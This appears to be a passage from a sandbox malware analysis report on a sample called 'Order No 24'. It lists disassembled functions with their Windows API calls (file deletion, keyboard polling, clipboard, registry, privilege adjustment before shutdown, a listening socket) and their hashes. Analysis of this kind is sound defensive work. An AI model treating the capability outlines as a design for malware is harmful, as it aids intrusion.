                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                  • Opcode ID: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
                                                                                                                                  • Instruction ID: 417264114bd67a972619bdbaca68f8a38bf22b8a2192b2e52aa92de2bba22194
                                                                                                                                  • Opcode Fuzzy Hash: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
                                                                                                                                  • Instruction Fuzzy Hash: 6C31D43394461EBADF10EFE0DC09BDE77ADAF45324F148556F801A22D1DB70DA868A64
                                                                                                                                  Function 00987D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset
                                                                                                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                                                                  • API String ID: 2102423945-2023335898
                                                                                                                                  • Opcode ID: 10abb51b9aab4e40dbfec29519e0efaa48b6a9e387d6868290497e8321d15e37
                                                                                                                                  • Instruction ID: bb63e855cd2ad8d9c4421aa2ab1bd64925edb32b31c65079aa8362dd690e040a
                                                                                                                                  • Opcode Fuzzy Hash: 10abb51b9aab4e40dbfec29519e0efaa48b6a9e387d6868290497e8321d15e37
                                                                                                                                  • Instruction Fuzzy Hash: F982CF71D04219CBCF24DF98C8907BEBBB5BF48310F2485A9D959AB391E7749E81CB90
                                                                                                                                  Function 009D091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 009D09DF
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 009D09EF
                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009D09FB
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009D0A59
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0A71
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0A83
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D0A98
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AAC
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0ADE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AFF
                                                                                                                                  • _wcscpy.LIBCMT ref: 009D0B0B
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009D0B4A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                                  • Opcode ID: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
                                                                                                                                  • Instruction ID: 9f6f1332383dcad8fe6be7be9bf1c44d6853bda77e6cce547dc3498ff1df62dd
                                                                                                                                  • Opcode Fuzzy Hash: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
                                                                                                                                  • Instruction Fuzzy Hash: 4A6136725082059FDB10EF60C845AAEB3E8FFC9314F04891EF99997351EB35EA45CB92
                                                                                                                                  Function 009BA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                                                                                                                    • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                                                                                                                    • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                                                                                                                    • Part of subcall function 009BABBB: HeapAlloc.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                                                                                                                    • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                                                                                                                    • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
                                                                                                                                    • Part of subcall function 009BAC56: HeapAlloc.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
                                                                                                                                    • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA6D0
                                                                                                                                  • _memset.LIBCMT ref: 009BA6E5
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA704
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009BA715
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009BA752
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA76E
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009BA78B
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA79A
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009BA7A1
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA7C2
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 009BA7C9
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA7FA
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BA820
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BA834
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3996160137-0
                                                                                                                                  • Opcode ID: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
                                                                                                                                  • Instruction ID: 1904bd344abf948cd9e6d2c0f288186cd1a90dd57b65ffd0df9b574e9b12d0cb
                                                                                                                                  • Opcode Fuzzy Hash: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
                                                                                                                                  • Instruction Fuzzy Hash: 2F514A71900209ABDF14DFE5DD85AEEBBB9FF44310F048129F915A72A0DB359A06CB61
                                                                                                                                  Function 009C63F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                                                                                                                    • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                                                                                                                  • _wcscat.LIBCMT ref: 009C6441
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009C645F
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 009C6474
                                                                                                                                  • _wcscpy.LIBCMT ref: 009C64A3
                                                                                                                                  • _wcscat.LIBCMT ref: 009C64B8
                                                                                                                                  • _wcscat.LIBCMT ref: 009C64CA
                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 009C64DA
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 009C64EB
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 009C6506
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                  • String ID: \*.*$p1#v`K$v
                                                                                                                                  • API String ID: 2643075503-1732502266
                                                                                                                                  • Opcode ID: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
                                                                                                                                  • Instruction ID: 7457d804b62220d72783b97de051c15627e43f1bd8c10b9e500d63f25a4cff95
                                                                                                                                  • Opcode Fuzzy Hash: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
                                                                                                                                  • Instruction Fuzzy Hash: 413121B2808388AAC721DBE48885EDBB7ECAB96310F44491EF5D9C3141EB35D54987A7
                                                                                                                                  Function 00986F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                  • API String ID: 0-4052911093
                                                                                                                                  • Opcode ID: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
                                                                                                                                  • Instruction ID: 271aedc37b367ab4d2a7f9193d9e5c8566e0f5090ce6e284fa19bee1e72e52e7
                                                                                                                                  • Opcode Fuzzy Hash: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
                                                                                                                                  • Instruction Fuzzy Hash: 5D727F71E04219DBDF24DF98D8807AEB7B5BF48310F24816AE915EB390DB749E81DB90
                                                                                                                                  Function 009E31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E328E
                                                                                                                                    • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                                                                                                                    • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009E332D
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009E33C5
                                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009E3604
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009E3611
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                  • Opcode ID: 835b1b70f618860a9946f4df965c1109f9c9a85805a03de79510a97325b5f262
                                                                                                                                  • Instruction ID: 5c1c4b0427857c5ea6c36ab3ac934a1b5d7c3e396a8e68c61c3ed8dfaa41598a
                                                                                                                                  • Opcode Fuzzy Hash: 835b1b70f618860a9946f4df965c1109f9c9a85805a03de79510a97325b5f262
                                                                                                                                  • Instruction Fuzzy Hash: A2E13A71604200AFCB15DF69C995E2ABBE8EF88714B04C96DF44ADB3A1DB30ED05CB52
                                                                                                                                  Function 009C2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009C2B5F
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 009C2BE0
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 009C2BFB
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 009C2C15
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 009C2C2A
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009C2C42
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 009C2C54
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009C2C6C
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 009C2C7E
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 009C2C96
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 009C2CA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                                                                                                                  • Instruction ID: cb89be99190bcde77a74580a86ff6bbd66c60aab35a1646ba3896017a9bccba8
                                                                                                                                  • Opcode Fuzzy Hash: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                                                                                                                  • Instruction Fuzzy Hash: 7F41C734D447C96DFF359BA48814BB9BEA86F22344F04809DD9C6562C2DBA49DC8C7A3
                                                                                                                                  Function 009D6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                  • Opcode ID: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                                                                                                                  • Instruction ID: 65deb1d6a3221a6a3e0d3ced408760198d60ce233975d891181f6321385ed1ac
                                                                                                                                  • Opcode Fuzzy Hash: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                                                                                                                  • Instruction Fuzzy Hash: 1F21A336340214AFDB11EF98EC49F6D77A9EF84710F04841AF94ADB2A1DB35EC028B51
                                                                                                                                  Function 009DC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009B9ABF: CLSIDFromProgID.OLE32 ref: 009B9ADC
                                                                                                                                    • Part of subcall function 009B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                                                                                                                    • Part of subcall function 009B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                                                                                                                    • Part of subcall function 009B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009DC235
                                                                                                                                  • _memset.LIBCMT ref: 009DC242
                                                                                                                                  • _memset.LIBCMT ref: 009DC360
                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 009DC38C
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 009DC397
                                                                                                                                  Strings
                                                                                                                                  • NULL Pointer assignment, xrefs: 009DC3E5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                  • Opcode ID: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                                                                                                                  • Instruction ID: a256952599308d79ee1b72802870b987562f9fb52245d650be862a561662669d
                                                                                                                                  • Opcode Fuzzy Hash: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                                                                                                                  • Instruction Fuzzy Hash: 33914DB1D00219ABDB10DFA4DC91FEEBBB9EF44710F10815AF515A7291DB70AA45CFA0
                                                                                                                                  Function 009C79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                                                                                                                    • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                                                                                                                    • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 009C7A0F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                  • String ID: $@$SeShutdownPrivilege
                                                                                                                                  • API String ID: 2234035333-194228
                                                                                                                                  • Opcode ID: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                                                                                                                  • Instruction ID: 9d8a8e8e49ab33002ccdefe6dda3ed9ee2301d731b5cc3ebb08dcd2c8c000b9f
                                                                                                                                  • Opcode Fuzzy Hash: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                                                                                                                  • Instruction Fuzzy Hash: 4A01A772E582156AF72C66F8DC5AFBFB25C9B04750F141C2CFD53A20D2D5A49E0189B2
                                                                                                                                  Function 009D8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009D8CA8
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8CB7
                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 009D8CD3
                                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 009D8CE2
                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009D8CFC
                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 009D8D10
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279440585-0
                                                                                                                                  • Opcode ID: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                                                                                                                  • Instruction ID: 05fed89f2c06e2370de31233ba316a9d9311d968c7fa5ae1ce5b7d466845e3a1
                                                                                                                                  • Opcode Fuzzy Hash: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                                                                                                                  • Instruction Fuzzy Hash: 2121A372600204EFCB10EFA8CD45B6EB7A9EF88714F148559F956A73D2CB70AD42CB61
                                                                                                                                  Function 009C6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 009C6583
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009C65A7
                                                                                                                                  • _wcscat.LIBCMT ref: 009C65BA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                                                                                                                  Memory Dump Source
